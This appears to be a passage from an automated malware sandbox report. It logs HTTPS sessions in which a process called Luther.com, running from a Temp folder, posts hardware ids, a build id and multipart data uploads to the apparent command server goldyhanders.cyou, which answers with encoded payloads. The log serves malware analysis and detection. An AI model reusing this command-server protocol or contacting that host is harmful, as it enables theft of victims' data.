                                                                                                        2025-01-12 14:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.549722104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:18 UTC265OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 80
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:18 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                                        2025-01-12 14:29:18 UTC1129INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:18 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=86r4ffk7hth92ff9012bsotdub; expires=Thu, 08 May 2025 08:15:57 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El1Shk9nlm3y8vUXWFOrx%2FPUWoonAXeGFxPHAgS1dKe36osMw%2Fzogl0ErmNSk6uZamhvzLE6CLTDxuTrUmX86iehgXxxGBACEEOP%2FJaUq27hNNHYlU2m394ZZjaZZMGzxbXoXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd685587c41ba-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1648&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3053&recv_bytes=981&delivery_rate=2552447&cwnd=193&unsent_bytes=0&cid=fb2bd52b886e6506&ts=436&x=0"
                                                                                                        2025-01-12 14:29:18 UTC240INData Raw: 31 63 62 62 0d 0a 35 38 68 73 4e 50 51 7a 32 42 32 31 4c 68 51 48 6c 32 54 76 45 6f 30 6f 69 6d 6a 54 51 76 6b 36 54 48 4d 37 73 37 4d 2f 43 4c 71 63 36 68 6f 57 7a 67 66 30 50 38 5a 4c 4e 6a 33 78 42 59 4e 68 36 41 53 6f 43 62 64 67 77 31 77 74 48 30 6a 57 6e 78 31 2b 31 38 58 79 43 6c 57 59 51 4c 30 78 6c 30 74 73 4a 61 30 2f 6c 44 44 6f 52 71 68 53 38 53 65 54 57 43 30 66 57 64 4c 59 55 48 6a 57 68 4b 41 41 55 35 78 57 75 33 6e 55 51 6e 6c 69 38 67 47 4f 65 4f 4e 42 35 77 43 2b 59 4e 55 59 4b 51 6b 5a 69 5a 46 79 62 63 36 47 68 51 31 48 6e 78 47 6c 4d 63 34 4d 63 57 6d 31 58 73 31 7a 36 45 72 6d 44 72 63 70 6b 56 49 6b 46 31 6a 58 32 55 39 68 33 49 2b 67 44 6c 43 64 58 4c 4a 74 32 55 68 2b 61 66 51 4c 6a 6a
                                                                                                        Data Ascii: 1cbb58hsNPQz2B21LhQHl2TvEo0oimjTQvk6THM7s7M/CLqc6hoWzgf0P8ZLNj3xBYNh6ASoCbdgw1wtH0jWnx1+18XyClWYQL0xl0tsJa0/lDDoRqhS8SeTWC0fWdLYUHjWhKAAU5xWu3nUQnli8gGOeONB5wC+YNUYKQkZiZFybc6GhQ1HnxGlMc4McWm1Xs1z6ErmDrcpkVIkF1jX2U9h3I+gDlCdXLJt2Uh+afQLjj
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 43 68 43 75 38 53 38 58 6a 62 43 78 77 53 53 4d 44 45 55 48 72 65 78 62 56 41 54 39 5a 57 74 6a 2b 50 44 48 35 70 2b 77 4f 4f 66 2b 68 4c 36 42 69 2b 49 4a 68 51 4a 68 56 54 33 74 35 53 5a 4e 4b 43 6f 67 64 52 6d 56 61 79 65 64 68 50 4e 69 75 31 41 5a 55 77 74 77 72 49 47 72 49 6a 6a 31 55 2f 55 55 61 66 79 42 31 74 31 4d 58 79 54 6c 43 59 55 4c 64 2f 78 55 52 39 62 76 41 55 68 6e 6e 69 52 2b 67 48 75 79 2b 59 57 43 6b 62 55 39 37 62 57 57 66 56 67 36 6f 4f 46 74 67 52 76 57 65 58 46 44 5a 47 38 42 61 4b 66 50 6b 49 30 6b 71 75 62 6f 49 59 4b 52 30 5a 69 5a 46 56 62 39 75 47 6f 51 46 56 6e 6c 71 6f 66 38 56 4b 65 32 44 6e 41 49 68 2b 35 55 6e 36 41 4c 38 6d 6d 46 45 6c 47 46 7a 57 31 52 30 6b 6d 49 4b 79 54 67 37 57 63 4c 64 30 32 30 5a 68 5a 62 55 5a 77
                                                                                                        Data Ascii: ChCu8S8XjbCxwSSMDEUHrexbVAT9ZWtj+PDH5p+wOOf+hL6Bi+IJhQJhVT3t5SZNKCogdRmVayedhPNiu1AZUwtwrIGrIjj1U/UUafyB1t1MXyTlCYULd/xUR9bvAUhnniR+gHuy+YWCkbU97bWWfVg6oOFtgRvWeXFDZG8BaKfPkI0kquboIYKR0ZiZFVb9uGoQFVnlqof8VKe2DnAIh+5Un6AL8mmFElGFzW1R0kmIKyTg7WcLd020ZhZbUZw
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 36 42 72 73 6d 6c 46 55 69 55 52 65 52 31 6b 55 71 67 4d 57 41 44 55 4b 56 57 2f 68 4b 31 45 4a 34 59 75 4e 47 6b 6a 37 32 43 75 38 47 38 58 6a 62 56 53 38 5a 58 38 50 65 55 47 6e 57 69 36 55 4c 57 5a 35 52 75 6e 4c 53 53 48 31 75 39 67 75 4a 59 75 56 4b 34 41 2b 77 4b 70 45 59 59 46 46 65 79 5a 45 46 4b 75 6d 53 6f 55 78 6a 6c 56 2b 30 65 4d 45 4d 61 53 76 73 52 6f 70 38 72 78 4b 6f 42 37 6b 6c 6e 6c 63 76 47 31 66 55 32 31 46 69 31 6f 61 34 41 56 4b 57 58 62 4a 31 32 6b 4a 79 62 66 77 4e 68 6e 62 76 53 2b 4a 4b 2f 32 43 63 51 47 35 4a 47 65 58 57 55 57 66 58 78 35 38 4e 57 4a 68 57 72 44 2f 49 41 6d 38 6c 38 67 72 4e 4b 4b 39 47 34 51 71 36 4b 70 39 59 4b 52 78 63 30 74 5a 65 5a 39 2b 50 70 41 6c 53 6d 6c 69 33 65 64 64 4c 63 6d 44 6e 41 34 52 38 34 77
                                                                                                        Data Ascii: 6BrsmlFUiUReR1kUqgMWADUKVW/hK1EJ4YuNGkj72Cu8G8XjbVS8ZX8PeUGnWi6ULWZ5RunLSSH1u9guJYuVK4A+wKpEYYFFeyZEFKumSoUxjlV+0eMEMaSvsRop8rxKoB7klnlcvG1fU21Fi1oa4AVKWXbJ12kJybfwNhnbvS+JK/2CcQG5JGeXWUWfXx58NWJhWrD/IAm8l8grNKK9G4Qq6Kp9YKRxc0tZeZ9+PpAlSmli3eddLcmDnA4R84w
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 59 49 51 57 4e 31 46 65 33 5a 45 46 4b 74 47 4d 75 41 42 59 6e 31 79 38 64 39 42 43 65 32 37 7a 44 59 70 33 36 55 66 67 42 37 51 6a 6d 6c 77 6b 41 31 72 61 32 31 42 67 6d 4d 76 71 43 55 37 57 43 66 70 59 32 32 56 6d 66 75 63 51 7a 57 2b 68 55 36 67 4e 76 57 44 44 47 43 30 65 55 4e 37 5a 56 57 58 58 67 61 51 49 55 4a 74 55 74 58 58 46 52 48 68 6f 2f 67 6d 47 59 75 39 48 37 41 61 31 4b 4a 42 53 62 6c 38 5a 31 73 6b 64 4d 70 69 77 70 77 46 57 6c 55 66 36 59 4a 6c 56 4e 6d 4c 35 52 74 55 77 34 30 54 6f 42 62 30 73 6b 46 41 76 48 56 66 57 31 46 52 69 30 4a 65 72 43 6c 36 58 58 37 56 2b 30 30 6c 7a 59 66 49 43 69 33 2b 76 42 4b 67 4e 71 57 44 44 47 41 45 32 62 4a 50 77 5a 79 72 48 79 37 4e 4f 55 5a 6f 52 34 6a 2f 62 54 33 70 74 2b 67 43 45 66 4f 56 44 34 77 61
                                                                                                        Data Ascii: YIQWN1Fe3ZEFKtGMuABYn1y8d9BCe27zDYp36UfgB7QjmlwkA1ra21BgmMvqCU7WCfpY22VmfucQzW+hU6gNvWDDGC0eUN7ZVWXXgaQIUJtUtXXFRHho/gmGYu9H7Aa1KJBSbl8Z1skdMpiwpwFWlUf6YJlVNmL5RtUw40ToBb0skFAvHVfW1FRi0JerCl6XX7V+00lzYfICi3+vBKgNqWDDGAE2bJPwZyrHy7NOUZoR4j/bT3pt+gCEfOVD4wa
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 79 6f 55 56 74 44 51 57 33 6a 66 6a 4c 67 41 57 35 6c 5a 73 6e 62 57 53 48 4e 6f 38 77 71 48 63 65 68 45 35 67 4c 78 62 74 74 66 4e 6c 45 42 6b 66 42 4e 63 63 71 54 70 79 39 62 6d 52 47 6c 4d 63 34 4d 63 57 6d 31 58 73 31 35 2f 55 37 6c 47 4c 67 6e 6c 56 63 74 41 31 6a 63 32 6b 39 74 31 34 47 74 41 6c 43 5a 56 37 74 36 33 55 42 78 59 50 34 4a 67 54 43 68 43 75 38 53 38 58 6a 62 64 69 55 43 54 74 4c 66 56 6e 7a 44 78 62 56 41 54 39 5a 57 74 6a 2b 50 44 48 56 75 2f 67 4b 4e 66 4f 39 4f 35 51 71 6a 4c 35 78 66 4a 78 70 4c 32 39 5a 61 59 64 43 4f 70 51 68 45 6d 6c 2b 6f 65 73 56 65 4e 69 75 31 41 5a 55 77 74 77 72 65 44 61 45 77 6d 42 6f 66 42 31 72 48 32 6c 42 6d 6d 4a 72 6b 46 78 61 52 58 66 6f 6e 6c 30 70 35 62 50 59 4a 6a 48 6e 6a 52 2b 30 44 74 43 47 64
                                                                                                        Data Ascii: yoUVtDQW3jfjLgAW5lZsnbWSHNo8wqHcehE5gLxbttfNlEBkfBNccqTpy9bmRGlMc4McWm1Xs15/U7lGLgnlVctA1jc2k9t14GtAlCZV7t63UBxYP4JgTChCu8S8XjbdiUCTtLfVnzDxbVAT9ZWtj+PDHVu/gKNfO9O5QqjL5xfJxpL29ZaYdCOpQhEml+oesVeNiu1AZUwtwreDaEwmBofB1rH2lBmmJrkFxaRXfonl0p5bPYJjHnjR+0DtCGd
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 76 53 79 68 31 31 6c 70 7a 71 43 56 72 57 43 66 70 38 30 45 39 33 62 2f 77 4b 67 6e 66 72 57 4f 49 4e 6f 79 47 61 55 79 4d 64 57 64 7a 63 56 32 76 52 69 4b 59 44 55 5a 46 65 76 7a 2b 5a 44 48 46 39 74 56 37 4e 55 65 4a 42 35 46 48 72 59 49 51 57 4e 31 46 65 33 5a 45 46 4b 74 69 50 72 77 52 62 6c 56 36 35 62 64 5a 4b 5a 47 58 34 44 4a 39 36 35 45 2f 6c 42 37 77 6a 6e 56 34 6c 48 55 76 59 30 56 35 68 6d 4d 76 71 43 55 37 57 43 66 70 63 77 46 70 38 59 76 6b 51 68 6e 48 73 58 4f 55 61 38 57 37 62 53 53 6b 41 47 59 6e 48 54 58 33 66 6d 75 51 58 46 70 46 64 2b 69 65 58 53 6e 39 6a 38 67 43 44 59 75 70 4d 35 77 57 34 4b 5a 39 51 4c 52 46 64 31 64 5a 59 61 64 53 4f 72 51 31 5a 6b 6c 69 30 64 74 67 4d 4f 43 58 79 48 73 30 6f 72 32 76 7a 43 62 30 74 32 30 64 67 43
                                                                                                        Data Ascii: vSyh11lpzqCVrWCfp80E93b/wKgnfrWOINoyGaUyMdWdzcV2vRiKYDUZFevz+ZDHF9tV7NUeJB5FHrYIQWN1Fe3ZEFKtiPrwRblV65bdZKZGX4DJ965E/lB7wjnV4lHUvY0V5hmMvqCU7WCfpcwFp8YvkQhnHsXOUa8W7bSSkAGYnHTX3fmuQXFpFd+ieXSn9j8gCDYupM5wW4KZ9QLRFd1dZYadSOrQ1Zkli0dtgMOCXyHs0or2vzCb0t20dgC
                                                                                                        2025-01-12 14:29:18 UTC278INData Raw: 64 62 63 44 46 38 6b 35 32 6e 55 65 2f 65 4d 45 4f 51 32 62 37 43 49 70 6d 72 31 58 58 52 50 45 68 32 77 41 58 43 42 6e 48 6b 51 55 34 6c 73 57 34 54 67 37 57 46 72 6c 74 78 55 70 31 63 2f 5a 42 73 30 37 49 58 4f 49 4e 6f 53 65 4d 56 32 35 66 47 64 36 52 42 56 4f 59 6a 4b 30 56 52 34 42 63 71 6e 69 58 63 7a 67 6c 37 55 62 56 4d 4e 70 4a 35 67 53 32 4e 6f 6f 56 43 51 64 54 31 73 46 61 66 64 66 46 35 45 35 51 31 67 6e 70 4d 5a 64 49 5a 79 57 74 56 74 38 72 75 68 6d 2f 57 75 4d 2f 31 55 46 75 42 78 6d 4a 67 78 4d 71 79 73 58 79 54 68 47 56 51 36 68 35 31 46 70 31 49 73 73 34 71 6d 72 69 54 50 38 62 6a 78 36 63 51 69 4d 58 54 73 43 64 53 47 6e 57 69 36 30 59 46 74 67 52 74 54 2b 50 64 54 59 74 74 54 6e 44 4d 50 63 4b 73 45 71 45 49 35 56 57 4b 51 64 49 6e 50
                                                                                                        Data Ascii: dbcDF8k52nUe/eMEOQ2b7CIpmr1XXRPEh2wAXCBnHkQU4lsW4Tg7WFrltxUp1c/ZBs07IXOINoSeMV25fGd6RBVOYjK0VR4BcqniXczgl7UbVMNpJ5gS2NooVCQdT1sFafdfF5E5Q1gnpMZdIZyWtVt8ruhm/WuM/1UFuBxmJgxMqysXyThGVQ6h51Fp1Iss4qmriTP8bjx6cQiMXTsCdSGnWi60YFtgRtT+PdTYttTnDMPcKsEqEI5VWKQdInP
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 33 31 65 35 0d 0a 6b 52 74 55 67 76 52 47 39 57 65 5a 77 79 55 64 67 43 42 6e 48 6b 51 55 34 6c 73 57 34 54 67 37 57 46 72 6c 74 78 55 70 31 63 2f 5a 42 73 30 37 42 54 65 34 50 74 6a 44 5a 64 69 55 46 58 70 47 66 48 57 57 59 33 5a 4e 4f 48 74 5a 75 39 44 2f 50 44 43 34 6c 77 41 57 44 66 75 68 63 2b 55 65 66 4a 35 31 64 4b 51 45 62 2f 39 70 4a 62 5a 6a 4c 36 67 67 57 7a 67 48 30 50 39 4e 64 4e 6a 32 6c 56 4e 59 6c 76 42 32 34 57 4b 35 75 67 68 67 34 55 51 47 44 6e 78 31 34 6d 4e 33 71 53 56 57 45 51 37 78 38 77 55 38 78 57 38 73 46 6d 33 33 67 51 65 6b 30 6a 77 36 57 57 53 30 66 47 2b 44 48 55 48 72 62 67 4b 30 77 61 4a 68 57 72 6e 6a 5a 53 6e 59 6c 75 30 61 43 4d 4c 64 7a 71 45 4c 78 48 39 55 59 4e 6c 45 42 6b 65 52 65 5a 4e 61 43 76 42 38 62 74 55 65 33
                                                                                                        Data Ascii: 31e5kRtUgvRG9WeZwyUdgCBnHkQU4lsW4Tg7WFrltxUp1c/ZBs07BTe4PtjDZdiUFXpGfHWWY3ZNOHtZu9D/PDC4lwAWDfuhc+UefJ51dKQEb/9pJbZjL6ggWzgH0P9NdNj2lVNYlvB24WK5ughg4UQGDnx14mN3qSVWEQ7x8wU8xW8sFm33gQek0jw6WWS0fG+DHUHrbgK0waJhWrnjZSnYlu0aCMLdzqELxH9UYNlEBkeReZNaCvB8btUe3
                                                                                                        2025-01-12 14:29:18 UTC1369INData Raw: 51 6c 72 55 62 4b 63 2f 31 59 37 67 6d 6e 49 39 78 6d 45 44 5a 58 31 74 42 4c 65 74 57 4a 69 77 31 48 6e 47 2b 45 61 74 52 43 65 47 4c 6a 46 38 30 2b 72 30 57 6f 55 6f 68 67 30 78 67 52 58 78 6e 4a 6b 51 55 71 37 59 61 6b 41 46 47 41 51 50 64 59 32 55 74 33 63 2b 55 4c 67 56 48 73 57 2b 4a 4b 2f 32 43 64 47 48 5a 44 46 35 48 56 54 43 71 41 31 66 68 56 41 38 55 47 36 69 33 49 41 6d 38 6c 34 30 62 56 49 71 45 4b 2b 6b 72 70 59 4e 78 62 50 41 4e 66 30 73 64 65 4c 65 61 37 6a 78 6c 56 68 6c 65 35 51 65 6c 6e 65 6d 50 79 48 49 70 32 79 57 71 6f 52 50 45 76 32 77 41 58 55 52 47 52 37 68 4d 71 77 4d 58 79 54 6d 4f 56 58 37 52 34 77 56 30 37 51 4f 49 46 6e 58 62 73 43 71 5a 4b 74 32 44 44 43 47 42 52 58 63 43 52 42 54 71 4b 33 76 39 64 41 63 59 44 70 54 48 4f 44
                                                                                                        Data Ascii: QlrUbKc/1Y7gmnI9xmEDZX1tBLetWJiw1HnG+EatRCeGLjF80+r0WoUohg0xgRXxnJkQUq7YakAFGAQPdY2Ut3c+ULgVHsW+JK/2CdGHZDF5HVTCqA1fhVA8UG6i3IAm8l40bVIqEK+krpYNxbPANf0sdeLea7jxlVhle5QelnemPyHIp2yWqoRPEv2wAXURGR7hMqwMXyTmOVX7R4wV07QOIFnXbsCqZKt2DDCGBRXcCRBTqK3v9dAcYDpTHOD


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.549733104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:19 UTC277OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=87R2HP2T24FS
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 12800
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:19 UTC12800OUTData Raw: 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d
                                                                                                        Data Ascii: --87R2HP2T24FSContent-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--87R2HP2T24FSContent-Disposition: form-data; name="pid"2--87R2HP2T24FSContent-Disposition: form-data; name="lid"jMw1IE--psyche--87R2HP2T24FS
                                                                                                        2025-01-12 14:29:20 UTC1134INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:20 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=d0r0h3s3vg5pmq1hagle0mc7bd; expires=Thu, 08 May 2025 08:15:59 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQr0g9xqFXfAnDgUYuPxYMTuCPBS%2BfOwsBxghq32GLb6YqgLpPxJviymBWuevS8ocs7XPhY3Q6d%2BMYXfEaq3d69iAvlIeoSbovr%2F3rIbKtnLdRNCdj5l0XMAHtb8zV9qdA9r%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd68ec8f90fa8-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1469&rtt_var=626&sent=9&recv=17&lost=0&retrans=0&sent_bytes=3053&recv_bytes=13735&delivery_rate=2981620&cwnd=253&unsent_bytes=0&cid=ce93aa3677833dfd&ts=611&x=0"
                                                                                                        2025-01-12 14:29:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-12 14:29:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.549744104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:20 UTC279OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=L6787UKPDE0UG5
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 15054
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:20 UTC15054OUTData Raw: 2d 2d 4c 36 37 38 37 55 4b 50 44 45 30 55 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 4c 36 37 38 37 55 4b 50 44 45 30 55 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 36 37 38 37 55 4b 50 44 45 30 55 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 4c 36 37 38 37 55 4b
                                                                                                        Data Ascii: --L6787UKPDE0UG5Content-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--L6787UKPDE0UG5Content-Disposition: form-data; name="pid"2--L6787UKPDE0UG5Content-Disposition: form-data; name="lid"jMw1IE--psyche--L6787UK
                                                                                                        2025-01-12 14:29:21 UTC1133INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:21 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=9qpl0b3bvemuac7itcla0vvjnu; expires=Thu, 08 May 2025 08:16:00 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKLuOarIzsAwsJaHhqhPZrhClClkyaVJnfOZJBB7GUkbWWXbPL%2BSP5Vbk94vHdutdBXZK3eVQqfcxdgw%2BNLYCK7TAbqY%2BPyQ2m9g2RXJvlQpLDnCNS0Wowhe35ITWYJFsf09Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd6968ee041ba-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1681&rtt_var=633&sent=10&recv=19&lost=0&retrans=0&sent_bytes=3053&recv_bytes=15991&delivery_rate=2605591&cwnd=193&unsent_bytes=0&cid=fa6460df662449d2&ts=617&x=0"
                                                                                                        2025-01-12 14:29:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-12 14:29:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.549750104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:22 UTC279OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=U1G1WYDNMWQDLV
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 20544
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:22 UTC15331OUTData Raw: 2d 2d 55 31 47 31 57 59 44 4e 4d 57 51 44 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 55 31 47 31 57 59 44 4e 4d 57 51 44 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 31 47 31 57 59 44 4e 4d 57 51 44 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 55 31 47 31 57 59 44
                                                                                                        Data Ascii: --U1G1WYDNMWQDLVContent-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--U1G1WYDNMWQDLVContent-Disposition: form-data; name="pid"3--U1G1WYDNMWQDLVContent-Disposition: form-data; name="lid"jMw1IE--psyche--U1G1WYD
